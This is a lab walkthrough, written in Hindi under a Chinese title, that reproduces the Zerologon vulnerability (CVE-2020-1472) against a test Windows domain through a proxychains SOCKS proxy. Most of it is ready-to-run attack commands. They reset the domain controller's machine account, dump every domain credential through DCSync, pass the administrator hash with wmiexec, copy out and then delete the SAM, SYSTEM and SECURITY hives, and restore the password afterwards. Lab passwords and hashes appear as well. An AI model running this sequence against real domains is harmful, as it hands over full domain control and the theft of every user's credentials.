
cve-2020-1472 复现利用及其exp
mac वातावरण में proxychains प्रॉक्सी के माध्यम से Windows डोमेन वातावरण में इस भेद्यता को दोहराना।
DC (मुख्य डोमेन नियंत्रक):

Domain User (डोमेन सदस्य होस्ट):
gost के माध्यम से सीधे SOCKS5 फॉरवर्ड प्रॉक्सी सेट करना।

Attack Hacker (हमलावर मशीन):
proxychains4 सेट करें
vim /Users/xq17/.proxychains/proxychains.conf
ProxyList सूची में जोड़ें
[ProxyList] socks5 10.211.55.42 8099
Attack Tools (हमले के उपकरण):
1.git clone https://github.com/mstxq17/cve-2020-1472.git
2.pip3 install -r requirements.txt
यदि निष्पादित करने पर यह त्रुटि आती है:

इसका मतलब है कि impacket मॉड्यूल में समस्या है। impacket मॉड्यूल को अनइंस्टॉल करने का प्रयास करें और GitHub पर नवीनतम संस्करण स्थापित करें।
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket && pip3 install .
समस्या हल हो जाएगी।
C# संस्करण उपकरण: https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon
पहले डोमेन नियंत्रक पासवर्ड का उपयोग करके डोमेन मशीन खाते का हैश निकालने का प्रयास करें, ताकि बाद में संशोधन के साथ तुलना की जा सके।
proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user "DC$"
या उद्धरण हटाएं, लेकिन ध्यान दें कि Linux में $ एक चर का प्रतिनिधित्व करता है, इसलिए इसे एस्केप करना याद रखें।
proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user DC\$

zerologon_tester.py का उपयोग करके जांचें कि भेद्यता मौजूद है या नहीं
python3 zerologon_tester.py DC 10.211.55.38

Success वापस आता है, जो भेद्यता की उपस्थिति दर्शाता है।
cve-2020-1472-exploit.py का उपयोग करके मशीन खाता रीसेट करें
python3 cve-2020-1472-exploit.py dc$ 10.211.55.38


डोमेन नियंत्रक के मशीन खाते का उपयोग करके DCSync के माध्यम से डोमेन में सभी उपयोगकर्ता क्रेडेंशियल निकाले जा सकते हैं
सिद्धांत:
DRS (डायरेक्टरी रेप्लिकेशन सर्विस) प्रोटोकॉल का उपयोग करके IDL_DRSGetNCChanges के माध्यम से डोमेन नियंत्रक से उपयोगकर्ता क्रेडेंशियल कॉपी करना।
proxychains4 secretsdump.py test.local/dc\[email protected] -no-pass

DC$ मशीन खाते का पासवर्ड पुनर्स्थापित करें इसके द्वारा
proxychains4 secretsdump.py test.local/dc\[email protected] -no-pass -just-dc | grep 'Administrator'
डोमेन व्यवस्थापक का हैश प्राप्त करें


फिर wmic का उपयोग करके, हैश पास करें और डोमेन नियंत्रक में स्थानीय व्यवस्थापक अधिकार (डोमेन व्यवस्थापक) प्राप्त करें
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/[email protected]
फिर क्रमशः निष्पादित करें, स्थानीय मशीन से SAM डेटाबेस को MAC साइड पर कॉपी करें
- reg save HKLM\SYSTEM system.save
- reg save HKLM\SAM sam.save
- reg save HKLM\SECURITY security.save
- get system.save
- get sam.save
- get security.save
- del /f system.save
- del /f sam.save
- del /f security.save
एकल डोमेन वातावरण में:
पूरी तरह से काम करता है। डोमेन नियंत्रक को पुनरारंभ करने के बाद, कोई असामान्यता नहीं है, लेकिन डोमेन सदस्य मशीनों के DNS में समस्या होती है, जो प्रमाणीकरण को प्रभावित नहीं करती।

पासवर्ड पुनर्स्थापित करने के बाद:

दोहरे डोमेन वातावरण, एक मुख्य डोमेन DC, एक बैकअप डोमेन नियंत्रक DC01:

प्रारंभ में दोनों डोमेन नियंत्रकों के मशीन हैश प्राप्त करने पर, वे अलग-अलग पाए गए।

सहायक डोमेन पर हमला करने का प्रयास किया गया, जिससे मुख्य डोमेन प्रभावित नहीं हुआ, और ntdis.dist डेटा भी सिंक हो गया।

मुख्य डोमेन पर हमला करने का प्रयास किया गया, net time /domain और एकल डोमेन वातावरण में भी त्रुटि होगी, लेकिन पासवर्ड ठीक करने के बाद तुरंत वापस आ गया।
नया खाता बनाने पर सीधे सिंक हो सकता है

पासवर्ड बदलने पर भी सिंक प्रभावित नहीं होता।
व्यक्तिगत रूप से, मुझे अब तक डोमेन से बाहर निकलने की कोई समस्या नहीं मिली है। सुझाव है कि आप मेरे इस प्रक्रिया का एक बार पालन करें। यदि कोई समस्या है, तो कृपया मुझसे चर्चा करने में संकोच न करें!
नेटलोगॉन विशेषाधिकार वृद्धि भेद्यता (CVE-2020-1472) सिद्धांत विश्लेषण और सत्यापन

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
मशीन खाते का सादा पाठ हेक्स निकालें

अंत में निष्पादित करें
proxychains4 python3 restorepassword.py DC@DC -target-ip 10.211.55.38 -hexpass 87e2812ccea41210c80e298c9e2a43a249d6a4056027787774340fbfd4b5f969563803b0f1bae7ccd24b29b41ae611025f1952793562d73e7f4e0f8938b3361332b35dd5ee22785b79b922149db32dc5c9301f4fd9fd090f532575bf5197a9c9230955bfd96ab928ae66b3999730c75b8545e26770816f21f2dbf9dbb19432211a91224c4c618507f7091ae09435a13a04bad5f056e72d34a96f67fa33d50e7596eca7709f398d98ba9e07407d7b2e4b937e40d1bf5ff0eb2240bdf0e8287e26ea5f8e69219fa7b1c5aa0e0bd8b992a176c32b0efb914fa6c1e53d69179110b02dfc1b1a0e53b445b92588420af18960

देखा जा सकता है कि जानकारी पूरी तरह से पुनर्स्थापित हो गई है।